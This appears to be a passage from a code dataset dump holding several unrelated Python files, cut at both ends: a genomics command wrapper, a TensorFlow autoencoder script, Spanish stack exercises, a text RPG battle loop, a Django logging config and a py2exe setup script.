reverse=True)\n sleep(3) #sleep 3 seconds\n\nclass Output(GeneralOutput):\n def __init__(self, Table='', Fields=[], *args, **kwargs):\n GeneralOutput.__init__(self, *args, **kwargs)\n self.table = Table\n self.fields = Fields\n\n def Run(self):\n #self.Manifest()\n variant.output(self)\n sleep(0) #sleep 3 seconds\n\nclass Export(Args):\n def __init__(self, Table='', Output=None, Samples=[], Format='', Build='hg19', Header=[], Jobs=1):\n Args.__init__(self)\n self.table = Table\n self.filename =False\n self.output = Output\n self.samples = Samples\n self.format = Format\n self.build = Build\n self.header = Header\n self.jobs = Jobs\n\n def Run(self):\n #self.Manifest()\n exporter.export(self)\n sleep(0) #sleep 3 seconds\n\nclass Remove(Args):\n def __init__(self, Type='', Items=[]):\n Args.__init__(self)\n self.type = Type\n self.items = Items\n\n def Run(self):\n #self.Manifest()\n project.remove(self)\n sleep(0) #sleep 3 seconds\n\nclass Execute(Args):\n def __init__(self, Specfile='', Pipelines=[], Input=[], Output=[], Jobs=1, Delimiter='\\t', Extra_args=''):\n Args.__init__(self)\n self.specfile = Specfile\n self.pipelines = Pipelines\n self.input = Input\n self.output = Output\n self.jobs = Jobs\n self.delimiter = Delimiter\n self.unknown_args = Extra_args.split()\n\n def Run(self):\n #self.Manifest()\n pipeline.execute(self)\n sleep(0) #sleep 3 seconds\n\nclass Admin(Args):\n def __init__(self,\n Update_resource='',\n Mirror_repository='',\n Merge_samples=False,\n Rename_samples=[],\n Rename_table=[],\n Describe_table=[],\n Validate_build=False,\n Validate_sex=False,\n Save_snapshot=[],\n Extra_files=[],\n Load_snapshot='',\n Set_runtime_option=[],\n Reset_runtime_option='',\n Record_exe_info=None,\n Partial_md5=None,\n Fasta2crr=None):\n Args.__init__(self)\n self.update_resource = Update_resource\n self.mirror_repository = Mirror_repository\n self.merge_samples = Merge_samples\n self.rename_samples = Rename_samples\n self.rename_table = Rename_table\n self.describe_table = Describe_table\n self.validate_build = Validate_build\n self.validate_sex = Validate_sex\n self.save_snapshot = Save_snapshot\n self.extra_files = Extra_files\n self.load_snapshot = Load_snapshot\n self.set_runtime_option = Set_runtime_option\n self.reset_runtime_option = Reset_runtime_option\n self.record_exe_info = Record_exe_info\n self.partial_md5 = Partial_md5\n self.fasta2crr = Fasta2crr\n\n def Run(self):\n #self.Manifest()\n project.admin(self)\n 
sleep(3) #sleep 3 seconds\n\nclass Show(Args):\n def __init__(self, Type=\"\", Items=[], Limit=None):\n Args.__init__(self)\n self.type = Type\n self.items = Items\n self.limit = Limit\n\n def Run(self):\n project.show(self)\n sleep(0)\n","sub_path":"src/Command.py","file_name":"Command.py","file_ext":"py","file_size_in_byte":9770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"445517284","text":"from autoencoder_models.DenoisingAutoencoder import MaskingNoiseAutoencoder\n\nimport numpy as np\nimport sklearn.preprocessing as prep\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\n\nmnist = input_data.read_data_sets('./data',one_hot=True)\n\ndef standard_scale(X_train,X_test):\n preprocessor = prep.StandardScaler().fit(X_train)\n X_train = preprocessor.transform(X_train)\n X_test = preprocessor.transform(X_test)\n return X_train,X_test\n\ndef get_random_black_from_data(data,batch_size):\n start_index = np.random.randint(0,len(data)-batch_size)\n return data[start_index:(start_index+batch_size)]\n\nX_train,X_text = standard_scale(mnist.train.images,mnist.test.images)\n\nn_samples = int(mnist.train.num_examples)\n\ntrain_epochs = 20\n\nbatch_sizd = 128\n\ndesplay_step = 10\n\ngae = MaskingNoiseAutoencoder(\n n_input=784,\n n_hidden=200,\n transfer_function=tf.nn.softplus,\n optimizer=tf.train.AdamOptimizer(learning_rate=0.001),\n)\n\nfor epoch in range(train_epochs):\n avg_cost = 0.\n total_batch = int(n_samples / batch_sizd)\n\n for i in range(total_batch):\n batch_xs = get_random_black_from_data(X_train, batch_sizd)\n\n cost = gae.partial_fit(batch_xs)\n\n avg_cost += cost / n_samples * batch_sizd\n\n if epoch % desplay_step == 0:\n print(\"Epoch:\", '%d,' % (epoch + 1), \"Cost:\", \"{:.9f}\".format(avg_cost))\n\nprint(\"Total cost: \" + str(gae.calc_total_cost(X_text)))\n\n'''\n\n'''\nplt.imshow(np.reshape(gae.reconstruct(X_text),(-1,28,28))[0])\nplt.show()","sub_path":"AdditiveGaussianNoiseAutoencoderRunner.py","file_name":"AdditiveGaussianNoiseAutoencoderRunner.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389682160","text":"from TDA_Pila import Pila, apilar, desapilar, pilaint, pilastring, invertir\nfrom TDA_Pila import pila_vacia, pila_llena, tamanio, ordenar_pila\nfrom TDA_Pila import cima, barrido\nimport random\n\nprint('TP3 - PILA')\nprint('')\n\n# Declaraciones para ejercicios\nvec = [5, 3, 2, 1, 6, 9, 0, 8, 7, 4]\n\nPN = Pila()\npilaint(PN)\nprint('Pila de numeros enteros')\nbarrido(PN)\nprint('')\n\nPC = Pila()\npilastring(PC)\nprint('Pila de caracteres')\nbarrido(PC)\nprint('')\n\n\n# EJ 1\ndef ocurrencias(P):\n '''Numero de ocurrencias de un determinado elemento en una pila'''\n c = 0\n busc = 10\n while not pila_vacia(P):\n x = desapilar(P)\n if x == busc:\n c += 1\n print('El numero ' + str(busc) + ' se repite ' + str(c) + ' veces')\n\n\n# EJ 2\ndef impares(P):\n '''Elimina numeros impares de una pila'''\n P2 = Pila()\n while not pila_vacia(P):\n x = desapilar(P)\n if x % 2 == 0:\n apilar(P2, x)\n invertir(P2)\n barrido(P2)\n\n\n# EJ 3\ndef reemplazo(P):\n '''Reemplaza un elemento repetido en una pila por otro dado'''\n P2 = Pila()\n reemplazar = 1999\n busc = 10\n while not pila_vacia(P):\n x = desapilar(P)\n if x == busc:\n x = reemplazar\n apilar(P2, x)\n invertir(P2)\n else:\n apilar(P2, x)\n barrido(P2)\n\n\n# EJ 4\n'''Ejercicio invertir esta en 
TDA'''\n\n\n# EJ 5\ndef palindromo():\n '''Devuelve True si una palabra es un palindromo'''\n P = Pila()\n cad = 'neuquen'\n print(cad)\n aux = len(cad)\n cad_aux = ''\n for i in range(0, aux):\n c = cad[i]\n apilar(P, c)\n while not pila_vacia(P):\n cad_aux = cad_aux + desapilar(P)\n if cad == cad_aux:\n print(cad_aux)\n print(True)\n else:\n print(cad_aux)\n print(False)\n\n\n# EJ 6\ndef inversa():\n '''Invierte una palabra'''\n P = Pila()\n cad = 'python'\n print(cad)\n aux = len(cad)\n cad_aux = ''\n for i in range(0, aux):\n c = cad[i]\n apilar(P, c)\n while not pila_vacia(P):\n cad_aux = cad_aux + desapilar(P)\n print(cad_aux)\n\n\n# EJ 7\ndef i_esimo(P):\n '''Elimina un i-esimo elemento que esta debajo de la cima'''\n Paux = Pila()\n pos = 5 # posicion en la pila\n if tamanio(P) > pos+1:\n i = 0\n while i < pos:\n x = desapilar(P)\n apilar(Paux, x)\n i += 1\n x = desapilar(P)\n print('elemento eliminado: ' + x)\n while not pila_vacia(Paux):\n x = desapilar(Paux)\n apilar(P, x)\n\n\n# EJ 8\ndef cartas():\n '''Pila de cartas de baraja espaniola,\n se debe incrementar el tamanio de la pila a 48 para este ejercicio'''\n P = Pila()\n Pesp = Pila()\n Pbas = Pila()\n Poro = Pila()\n Pcop = Pila()\n palos = ['Espada', 'Basto', 'Oro', 'Copa']\n for i in range(1, 48):\n num = random.randint(1, 12)\n palo = random.choice(palos)\n apilar(P, [num, palo])\n while not pila_vacia(P):\n x = desapilar(P)\n if x[1] == 'Espada':\n apilar(Pesp, x)\n elif x[1] == 'Basto':\n apilar(Pbas, x)\n elif x[1] == 'Oro':\n apilar(Poro, x)\n elif x[1] == 'Copa':\n apilar(Pcop, x)\n print('Mazo de espada')\n barrido(Pesp)\n print('Mazo de basto')\n barrido(Pbas)\n print('Mazo de oro')\n barrido(Poro)\n print('Mazo de copa')\n barrido(Pcop)\n Pesp = ordenar_pila(Pesp)\n print('Mazo de espada ordenados')\n barrido(Pesp)\n\n\n# EJ 9\ndef factorial(num):\n '''Pila de factoriales de un numero dado'''\n P = Pila()\n for i in range(1, num+1):\n apilar(P, i)\n print('')\n barrido(P)\n resultado = 1\n while not pila_vacia(P):\n resultado *= desapilar(P)\n return resultado\n\n\n# EJ 10\ndef dioses_griegos():\n '''Inserta el nombre de 'Atenea' en una pila de dioses griegos'''\n P = Pila()\n Paux = Pila()\n pos = 2 # posicion en la lista\n dioses = ['Zeus', 'Poseidon', 'Hades', 'Arkantos', 'Apolo', 'Hermes',\n 'Ares', 'Persefone', 'Artemisa']\n for i in range(0, 9):\n apilar(P, dioses[i])\n print('Pila de dioses griegos:')\n barrido(P)\n print('')\n if tamanio(P) > pos+1:\n i = 0\n while i < pos:\n x = desapilar(P)\n apilar(Paux, x)\n i += 1\n x = apilar(P, 'ATENEA')\n while not pila_vacia(Paux):\n apilar(P, desapilar(Paux))\n barrido(P)\n print('Se inserto a la diosa \"Atenea\" en la posicion: ' + str(pos))\n\n\n# EJ 11\ndef vocales(P):\n '''Determina cuantas vocales hay en una pila de caracteres'''\n c = 0\n while not pila_vacia(P):\n x = desapilar(P)\n if x == 'A' or x == 'a' or x == 'E' or x == 'e' or x == 'I' or x == 'i' or x == 'O' or x == 'o' or x == 'U' or x == 'u':\n c += 1\n print('Cantidad de vocales: ' + str(c))\n\n\n# EJ 12\ndef busqueda_sw():\n '''Busqueda personajes de Star Wars'''\n P = Pila()\n Paux = Pila()\n leia = False\n bf = False\n personajes = ['Darth Vader', 'Luke Skywalker', 'Chewbacca', 'Yoda', 'R2D2',\n 'Obi-Wan Keobi', 'Han Solo', 'C3PO', 'Leia Organa',\n 'Jabba el Hutt', 'Boba Fett']\n for i in range(0, 10):\n sw = random.choice(personajes)\n apilar(P, sw)\n print('Pila de personajes:')\n barrido(P)\n print('')\n while not pila_vacia(P):\n x = desapilar(P)\n if x == 'Leia Organa':\n apilar(Paux, 
x)\n leia = True\n if x == 'Boba Fett':\n apilar(Paux, x)\n bf = True\n while not pila_vacia(Paux):\n apilar(P, desapilar(Paux))\n if leia:\n print('Leia Organa se encuentra en la pila')\n else:\n print('Leia Organa no esta almacenada')\n if bf:\n print('Boba Fett se encuentra en la pila')\n else:\n print('Boba Fett no esta almacenado')\n\n\n# EJ 13\ndef crecientes():\n '''Inserta elementos en una pila de manera creciente'''\n P = Pila()\n Paux = Pila()\n while not pila_llena(P):\n dato = random.randint(1, 50)\n print(str(dato) + ' agregado')\n if not pila_vacia(P): # ingresa cuando hay al menos un elemento en P\n while not pila_vacia(P) and cima(P) >= dato:\n apilar(Paux, desapilar(P))\n apilar(P, dato)\n while not pila_vacia(Paux):\n apilar(P, desapilar(Paux))\n print('')\n barrido(P)\n\n\n# EJ 14\ndef quicksort(vec, pri, ult):\n '''Ordenamiento quicksort'''\n P = Pila()\n apilar(P, [pri, ult])\n datos = []\n while not pila_vacia(P):\n datos = desapilar(P)\n i = datos[0]\n j = datos[1] - 1\n pivot = datos[1]\n while i < j:\n while vec[i] <= vec[pivot] and i < j:\n i += 1\n while vec[j] > vec[pivot] and i < j:\n j -= 1\n if i <= j:\n vec[i], vec[j] = vec[j], vec[i]\n if vec[pivot] < vec[i]:\n vec[pivot], vec[i] = vec[i], vec[pivot]\n if datos[0] < j:\n apilar(P, [datos[0], j])\n if datos[1] > i:\n apilar(P, [i+1, datos[1]])\n\n\n# EJ 15\ndef interseccion_sw():\n '''Obtiene los personajes que aparecieron en el episodio V y VII\n de la saga Star Wars'''\n P5 = Pila()\n P7 = Pila()\n Paux = Pila()\n ep5 = ['Luke Skywalker', 'Lando Calrissian', 'Yoda', 'Chewbacca',\n 'Emperador Palpatine', 'C3PO']\n ep7 = ['Rey', 'Finn', 'Luke Skywalker', 'Kylo Ren', 'Chewbacca',\n 'C3PO']\n for i in range(0, 5):\n apilar(P5, ep5[i])\n apilar(P7, ep7[i])\n print('Episodio V: The empire strikes back')\n barrido(P5)\n print('')\n print('Episodio VII: The force awakens')\n barrido(P7)\n print('')\n while not pila_vacia(P5):\n x = desapilar(P5)\n while not pila_vacia(P7):\n y = desapilar(P7)\n if(x == y):\n print('El personaje ' + str(x) + ' se encuentra en ambos episodios')\n apilar(Paux, y)\n while(not pila_vacia(Paux)):\n y = desapilar(Paux)\n apilar(P7, y)\n\n\n# EJ 16\ndef contador():\n '''Algoritmo que muestra datos de un parrafo, tal como sus vocales,\n consonantes, numeros, espacios en blancos y otros simbolos'''\n PV = Pila()\n PC = Pila()\n PO = Pila()\n parrafo = 'Miedo, ira, agresividad, el lado oscuro ellos s0n. 
Si algun dia rigen tu vida, para siempre tu destino dominaran.'\n numeros = '0123456789'\n vocales = 'aeiouAEIOU'\n consonantes = 'bcdfghjklmnpqrstvwxyzBCDFGHJKLMNPQRSTVWXYZ'\n for elemento in parrafo:\n if elemento in vocales:\n apilar(PV, elemento)\n elif elemento in consonantes:\n apilar(PC, elemento)\n else:\n apilar(PO, elemento)\n\n # A) B) y D)\n voc, cons, otr, espbl, num = 0, 0, 0, 0, 0\n while not pila_vacia(PV):\n desapilar(PV)\n voc += 1\n while not pila_vacia(PC):\n desapilar(PC)\n cons += 1\n while not pila_vacia(PO):\n x = desapilar(PO)\n otr += 1\n if x == ' ':\n espbl += 1\n elif x in numeros:\n num += 1\n print('Cantidad de vocales: ' + str(voc))\n print('Cantidad de consonantes: ' + str(cons))\n print('Cantidad de otros caracteres: ' + str(otr))\n print('Cantidad de espacios en blanco: ' + str(espbl))\n print('Cantidad de numeros: ' + str(num))\n\n # C)\n total = voc + cons + otr\n print('Porcentaje de vocales: ' + str((voc * 100) / total) + '%')\n print('Porcentaje de consonantes: ' + str((cons * 100) / total) + '%')\n\n # E)\n if voc == otr:\n print('Igual cantidad')\n else:\n print('Cantidades distintas')\n\n # F)\n LetraZ = False\n while not pila_vacia(PC):\n dato = desapilar(PC)\n if dato == 'z':\n LetraZ = True\n if LetraZ:\n print('Existen letras Z en el parrafo')\n else:\n print('No hay letras Z en el parrafo')\n\n\n# EJ 17\ndef piladeobjetos():\n '''Ordena una pila de objetos por su peso'''\n P = Pila()\n objetos = ['monitor', 'teclado', 'raton', 'carpeta',\n 'almohadilla', 'sujetapapeles', 'abrochadora', 'cafetera']\n for i in range(0, len(objetos)):\n pes = random.randint(1, 20)\n apilar(P, [pes, objetos[i]])\n print('Pila de objetos(en kg.)')\n barrido(P)\n print('')\n P = ordenar_pila(P)\n print('Pila de objetos ordenados por peso:')\n barrido(P)\n\n\n# EJ 18\ndef peliculas():\n '''Pila de peliculas y sus datos'''\n P = Pila()\n Paux = Pila()\n c = 0\n titulo = ['Capitan America', 'Relatos Salvajes', 'Bohemian Rhapsody',\n 'Doctor Strange', 'Avengers: Infinity War',\n 'Guardianes de la galaxia']\n estudio = ['Marvel Studios', 'Kramer and Sigman Films', 'GK Films',\n 'Marvel Studios', 'Marvel Studios', 'Marvel Studios']\n anio = ['2016', '2014', '2018', '2016', '2018', '2014']\n for i in range(0, 6):\n title, studio, year = titulo[i], estudio[i], anio[i]\n apilar(P, [title, studio, year])\n print('Peliculas:')\n barrido(P)\n print('')\n while not pila_vacia(P):\n dato = desapilar(P)\n if dato[2] == '2014':\n print(str(dato[0]) + ' fue estrenada en 2014')\n if dato[2] == '2018':\n c += 1\n if dato[1] == 'Marvel Studios' and str(dato[2]) == '2018':\n print(str(dato[0]) + ' fue producida por Marvel en el anio 2018')\n print('Se estrenaron ' + str(c) + ' peliculas en 2018')\n\n\n# EJ 19\n\n\n# ocurrencias(PN)\n# impares(PN)\n# reemplazo(PN)\n# invertir(PN)\n# palindromo()\n# inversa()\n# i_esimo(PC)\n# cartas()\n# factorial(10)\n# dioses_griegos()\n# vocales(PC)\n# busqueda_sw()\n# crecientes()\n# quicksort(vec, 0, len(vec)-1)\n# print(vec)\n# interseccion_sw()\n# contador()\n# piladeobjetos()\n# peliculas()\n","sub_path":"TP3_Pila/Unit_Pila.py","file_name":"Unit_Pila.py","file_ext":"py","file_size_in_byte":11806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"418607726","text":"from classes.game import Person, bcolors\nfrom classes.magic import Spell\nfrom classes.inventory import Item\nimport random\n\nprint(\"\\n\\n\")\n#black magic\nfire = Spell(\"Fire\", 70, 180, \"black\")\nthunder = 
Spell(\"Thunder\", 15, 140, \"black\")\nblizzard = Spell(\"Blizzard\", 30, 250, \"black\")\ndbeam = Spell(\"Dark Beam\", 100, 3000, \"black\")\nforceflash = Spell(\"Team Attack.\", 170, 4500, \"black\")\n#white magic\ncure = Spell(\"Cure\", 25, 1200, \"white\")\nbandage = Spell(\"Bandage\", 5, 100, \"white\")\nsensubean = Spell(\"Take a Sensu Bean\", 60, 700, \"white\")\n\n#create some items\npotion = Item(\"Potion\", \"potion\", \"Heals 100 HP\", 100)\ndarke = Item(\"Dark Energy\", \"potion\", \"Heals 2000 HP\", 2000)\nsuperpotion = Item(\"Super Potion\", \"potion\", \"Heals 200 HP\", 150)\nelixer = Item(\"Elixer\", \"elixer\", \"Fully restores Hp of one party member\", 99999)\nbagofbeans = Item(\"Bag of Beans\", \"elixer\",\"Heals the Entire Team\", 99999 )\n#items that doo damage\ngerenade = Item(\"Gerenade\", \"attack\", \"Deals 500 HP damage.\", 500)\nteamattack = Item(\"Team Attack\", \"attack\", \"Focus the team into a single attack.\", 4000)\n\n\n\n\nplayer_magic = [fire, thunder, blizzard, dbeam, forceflash, bandage, cure, sensubean]\nplayer_items = [ {\"item\": potion,\"quantity\": 3}, {\"item\": superpotion, \"quantity\":2}, {\"item\": elixer, \"quantity\": 1},\n {\"item\": bagofbeans, \"quantity\": 1}, {\"item\": gerenade, \"quantity\": 3}, {\"item\": teamattack, \"quantity\": 1}]\n\n\n # instntiate people\nplayer1 = Person(\"Valos \", 4000, 150, 120, 35,[fire, thunder, blizzard, cure, sensubean] , [{\"item\": superpotion, \"quantity\":2},{\"item\": gerenade, \"quantity\": 5},])\nplayer2 = Person(\"Akeron\", 2900, 200, 190, 35, [fire, blizzard,cure,], [{\"item\": potion,\"quantity\": 3},{\"item\": elixer, \"quantity\": 1},{\"item\": gerenade, \"quantity\": 3}])\nplayer3 = Person(\"Don \", 3500, 400, 270, 250, [bandage,sensubean, thunder, dbeam, forceflash], [{\"item\": bagofbeans, \"quantity\": 1}, {\"item\": teamattack, \"quantity\": 1}])\n\nplayers = [player1, player2, player3]\n\nenemy1 = Person(\"Goony\", 10200, 65, 850, 25, [], [{\"item\": darke, \"quantity\":1}])\nenemy2 = Person(\"Randy\", 3000, 65, 350, 50, [], [{\"item\": darke, \"quantity\":2}])\nenemy3 = Person(\"Jimmy\", 7200, 65, 650, 155, [], [{\"item\": darke, \"quantity\":0}])\n\nenemies = [enemy1, enemy2, enemy3]\n\nrunning = True\ni = 0\n# bcolors endc stop colors\nprint(bcolors.FAIL + bcolors.BOLD + \"***A Gang Attacks!!!!\" + bcolors.ENDC)\n\nwhile running:\n print(\"===============================\\n\")\n for enemy in enemies:\n enemy.get_enemy_stats()\n print(\"\\n\" + bcolors.OKGREEN + bcolors.BOLD + \"\" + bcolors.ENDC)\n\n for player in players:\n if player.get_hp() > 0:\n print(\"\\n\")\n\n player1.get_stats()\n player2.get_stats()\n player3.get_stats()\n print(\"\\n\")\n\n player.choose_action()\n choice = input(\"Choose action:\")\n index = int(choice) - 1\n\n\n if index == 0:\n dmg = player.generate_damage()\n enemy = player.choose_target(enemies)\n enemies[enemy].take_dmg(dmg)\n print(player.name + \" did \", dmg, \" Damage.\\n\" + enemies[enemy].name + \" has\", enemies[enemy].get_hp(), \" HP left!\")\n\n elif index == 1:\n player.choose_magic()\n magic_choice = int(input(\"Choose a Spell:\")) - 1\n\n if magic_choice == -1:\n continue\n\n spell = player.magic[magic_choice]\n magic_dmg = spell.generate_damage()\n\n current_mp = player.get_mp()\n if spell.cost > current_mp:\n print(bcolors.FAIL + \"\\n Not enough MP\\n\" + bcolors.ENDC)\n continue\n player.reduce_mp(spell.cost)\n\n if spell.type == \"white\":\n player.heal(magic_dmg)\n print(bcolors.OKBLUE + \"\\n\" + spell.name + \" heals \" + 
player.name + \" for \", str(magic_dmg), \" HP.\" + bcolors.ENDC)\n\n elif spell.type == \"black\":\n enemy = player.choose_target(enemies)\n enemies[enemy].take_dmg(magic_dmg)\n print(bcolors.OKBLUE + player.name + \" used \" + spell.name + \"\\n and did\", magic_dmg, \" Damage.\\n\" + enemies[enemy].name + \" has\",\n str(enemies[enemy].get_hp()) + \" hp left!\", bcolors.ENDC)\n elif index == 2:\n player.choose_item()\n item_choice = int(input(\"Choose Item:\")) - 1\n\n if item_choice == -1:\n continue\n item = player.items[item_choice][\"item\"]\n if player.items[item_choice][\"quantity\"] == 0:\n print(bcolors.FAIL + player.name + \"\\n doesnt have any \" + item.name + bcolors.ENDC)\n continue\n\n player.items[item_choice][\"quantity\"] -= 1\n\n\n\n\n if item.type == \"potion\":\n player.heal(item.prop)\n print(bcolors.OKGREEN + \"\\n\" + item.name + \" Heals \" + player.name + \" For \", str(item.prop), \"HP\" + bcolors.ENDC)\n\n elif item.type == \"elixer\":\n if item == dathenny:\n for i in players:\n i.hp = i.maxhp\n i.mp = i.maxmp\n\n print(bcolors.OKGREEN + item.name + \" Fully healed the entire team!\" + bcolors.ENDC)\n\n else:\n player.hp = player.maxhp\n player.mp = player.maxmp\n print(bcolors.OKGREEN + item.name + \" Fully healed \" + player.name + \"!\" +bcolors.ENDC)\n\n\n elif item.type == \"attack\":\n enemy = player.choose_target(enemies)\n enemies[enemy].take_dmg(item.prop)\n print(bcolors.OKGREEN + player.name + \" used \" + item.name + \" and did \", str(item.prop), \" damage to \" + enemies[enemy].name + \"!\" + bcolors.ENDC)\n\n defeated_enemies = 0\n defeated_players = 0\n\n\n for enemy in enemies:\n\n\n if enemy.get_hp() == 0:\n print(bcolors.OKGREEN + bcolors.BOLD + str(enemy.name) + \" is down!\" + bcolors.ENDC)\n del enemy\n defeated_enemies += 1\n if defeated_enemies == 3:\n\n print(bcolors.OKGREEN + bcolors.BOLD + \"YOU WIN!\" + bcolors.ENDC)\n running = False\n else:\n for enemy in enemies:\n enemy.choose_itemx()\n\n item_choice = 0\n if enemy.items[item_choice][\"quantity\"] < 1:\n if enemy.get_hp() > 0:\n enemy_choice = 1\n target = random.randrange(0, 3)\n enemy_dmg = enemy.generate_damage()\n players[target].take_dmg(enemy_dmg)\n print(bcolors.FAIL + bcolors.BOLD + \" \\n\" + enemy.name + \" attacks \" + players[\n target].name + \" for \", enemy_dmg, \" damage!!!!\\n\" + bcolors.ENDC)\n\n\n else:\n if enemy.items[item_choice][\"quantity\"] > 0:\n\n if enemy.get_hp() < enemy.maxhp - 2000:\n print(bcolors.FAIL + enemy.name + \" has Dark Energy around him!\\n\" + \" \\nThe Dark Energy heals \" + enemy.name + \" for 2000hp!\" )\n enemy.heal(2000)\n enemy.items[item_choice][\"quantity\"] -= 1\n\n else:\n if enemy.get_hp() > enemy.maxhp - 2000:\n enemy_choice = 1\n target = random.randrange(0, 3)\n enemy_dmg = enemy.generate_damage()\n players[target].take_dmg(enemy_dmg)\n print(bcolors.FAIL + bcolors.BOLD + \" \\n\" + enemy.name + \" attacks \" +\n players[\n target].name + \" for \", enemy_dmg, \" damage!!!!\\n\" + bcolors.ENDC)\n\n\n\n\n\n\n\n\n for player in players:\n if player.get_hp() == 0:\n print(bcolors.FAIL + bcolors.BOLD + player.name + \" is down!\" + bcolors.ENDC)\n del player\n defeated_players += 1\n\n\n\n if defeated_players == 3:\n print(bcolors.FAIL + bcolors.BOLD + \"Your team has been WIPED OUT!!\\n *****GAME OVER*****\" + bcolors.ENDC)\n running = False\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"49751901","text":"import os\n\n# from django_admin.settings import BASE_DIR\nfrom django.conf import settings\nBASE_DIR = settings.BASE_DIR\n\nprint('filename', BASE_DIR / 'recruitment.admin.log')\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(asctime)s %(name)-12s %(lineno)d %(levelname)-8s %(message)s'\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n # 'mail_admins': {\n # 'level': 'ERROR',\n # 'class': 'django.util.log.AdminEmailHandler'\n # },\n 'file': {\n 'class': 'logging.FileHandler',\n 'formatter': 'simple',\n 'filename': BASE_DIR / 'recruitment.admin.log',\n },\n },\n 'root': {\n 'handlers': ['console', 'file'],\n 'level': 'INFO',\n },\n 'loggers': {\n 'myapp': {\n 'handlers': ['console', 'file'],\n 'level': 'DEBUG'\n }\n }\n}\n","sub_path":"python_02_django/02_django_admin/apps/mysettings/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424417134","text":"\n# coding=Big5\n# 如果要使用中文須宣告 coding=Big5\n\"\"\"\nhttp://pythontips.com/2014/03/03/using-py2exe-the-right-way/\nhttps://docs.python.org/3/library/glob.html\n\nerror handle as below:\nhttp://python.6.x6.nabble.com/PyQt-4-7-and-py2exe-error-td1922933.html\n\"\"\"\n\nfrom distutils.core import setup\nimport sys\nimport glob\n\ntry:\n import py2exe\nexcept ImportError:\n print(\"Warning: py2exe not usable\")\n\nVERSION = 'CLONIN'\nAUTHOR = 'Kevin Liao'\n\n\n#this allows to run it with a simple double click.\nsys.argv.append('py2exe')\n\n\"\"\"\npy2exe_options = {\n \"includes\": [\"sip\", \"PyQt4\", \"ui.*\"],\n \"dll_excludes\": [\"MSVCP90.dll\", \"w9xpopen.exe\"],\n \"compressed\": 1,\n \"optimize\": 2,\n \"ascii\": 0,\n \"bundle_files\": 1,\n }\"\"\"\n\nPY2EXE_OPTIONS = {\n \"includes\": [\"sip\", \"PyQt4\", \n # 如下,載入相關 module , 某資料夾底下有 __init__.py , 當程式執行 __import__(Module_Name, ...) 
語法可以找到相關 Module_Name\n \"driver.*\",\n \"ui.*\",\n \"ui.tabs.*\",\n \"ui.objects.*\",\n \"ui.widgets.*\",\n \"ui.widgets.plotter.*\",\n \"ui.boxes.*\",\n \"ui.setting.*\",\n \"ui.setting.main.*\"\n ],\n \"dll_excludes\": [\"MSVCP90.dll\", \"w9xpopen.exe\"],\n \"compressed\": 1,\n \"optimize\": 2,\n \"ascii\": 0,\n \"bundle_files\": 1,\n }\n\n\n# DATA_OPTIONS = [(目標資料夾 1 , 來源檔案 1) , (目標資料夾 2 , 來源檔案 2)] \n# glob - Unix style pathname pattern expansion\nDATA_OPTIONS = [ ('lib/configs', glob.glob('lib/configs/*.json')),\n ('lib/image', glob.glob('lib/image/*.gif')),\n ('lib/image', glob.glob('lib/image/*.ico')),\n ('lib/image/blink', glob.glob('lib/image/blink/*.gif')),\n ('lib/image/loading', glob.glob('lib/image/loading/*.gif')),\n ('lib', glob.glob('lib/*.py')),\n ('lib/driver', glob.glob('lib/driver/*.py')),\n ('lib/ui', glob.glob('lib/ui/*.ui')),\n ('lib/ui', glob.glob('lib/ui/*.py')),\n ('lib/ui/boxes', glob.glob('lib/ui/boxes/*.ui')),\n ('lib/ui/boxes', glob.glob('lib/ui/boxes/*.py')),\n ('lib/ui/objects', glob.glob('lib/ui/objects/*.py')),\n ('lib/ui/setting', glob.glob('lib/ui/setting/*.py')),\n ('lib/ui/setting/main', glob.glob('lib/ui/setting/main/*.py')),\n ('lib/ui/tabs', glob.glob('lib/ui/tabs/*.ui')),\n ('lib/ui/tabs', glob.glob('lib/ui/tabs/*.py')),\n ('lib/ui/widgets', glob.glob('lib/ui/widgets/*.ui')),\n ('lib/ui/widgets', glob.glob('lib/ui/widgets/*.py')),\n ('lib/ui/widgets/plotter', glob.glob('lib/ui/widgets/plotter/*.py'))\n\n\n ]\n\n\"\"\"\nDATA_OPTIONS = [('lib', glob.glob('lib/*.py')),\n ('lib/configs', glob.glob('lib/configs/*.json')),\n ('lib/ui', glob.glob('lib/ui/*.py')),\n ('lib/ui', glob.glob('lib/ui/*.ui')),\n ('lib/ui/tabs', glob.glob('lib/ui/tabs/*.py')),\n ('lib/ui/tabs', glob.glob('lib/ui/tabs/*.ui')),\n ('lib/ui/widgets', glob.glob('lib/ui/widgets/*.py')),\n ('lib/ui/widgets', glob.glob('lib/ui/widgets/*.ui')),\n ('lib/ui/boxes', glob.glob('lib/ui/boxes/*.py')),\n ('lib/ui/boxes', glob.glob('lib/ui/boxes/*.ui')),\n ('lib/ui/setting', glob.glob('lib/ui/setting/plotter/*.py')),\n ('lib/ui/setting', glob.glob('lib/ui/setting/main/*.py')),\n ('lib/driver', glob.glob('lib/driver/*.py')),\n ('lib/image', glob.glob('lib/image/*.gif')),\n ('lib/image', glob.glob('lib/image/*.ico'))]\n\"\"\"\n# 編輯時,將會把指定路徑的 *.py 檔案複製到 build 資料夾內\n#PACKAGES = ['ui', 'driver', 'image', 'configs', 'ui.tabs', 'ui.widgets', 'ui.setting.plotter', 'ui.setting.main', 'ui.boxes']\nPACKAGES = ['driver', 'ui', 'ui.boxes', 'ui.objects', 'ui.tabs', 'ui.widgets', 'ui.widgets.plotter', 'ui.setting', 'ui.setting.main']\n\nsetup(\n name = 'client',\n version = VERSION,\n author = AUTHOR,\n zipfile = None,\n data_files = DATA_OPTIONS,\n #windows = [\n # { \n # \"script\" : 